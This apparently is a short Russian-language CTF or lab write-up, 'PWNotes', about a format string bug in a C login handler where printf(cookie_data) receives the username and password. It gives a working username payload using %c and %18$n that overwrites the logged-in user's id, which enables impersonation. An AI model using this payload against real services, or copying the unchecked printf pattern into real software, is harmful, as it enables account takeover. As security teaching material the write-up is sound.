# PWNotes

В процедуре входа (callback_login) есть уязвимость форматной строки:

```
    sqlite3_int64 user_id = sqlite3_column_int(stmt, 0);
    sqlite3_int64 *user_id_addr = &user_id;

    char *cookie_data;
    asprintf(&cookie_data, "%s%s%s", username, passwd, rand_string(15));
    char *cookie = pass_hash(cookie_data);
    if (LOGGING)
        printf("%llx %lld %18$llx\n", user_id_addr, *user_id_addr);
    
    // vuln
    printf(cookie_data);
```

Имя пользователя и пароль попадают в первый аргумент функции printf

С её помощью можно перезаписать id пользователя при входе
Например, так:

```
    username = f'%{id}c%18$n'
    password = '123'
```

`%{id}c` - выводит заданное количество символов
`%18$n` - записывает по адресу количество выведенных символов
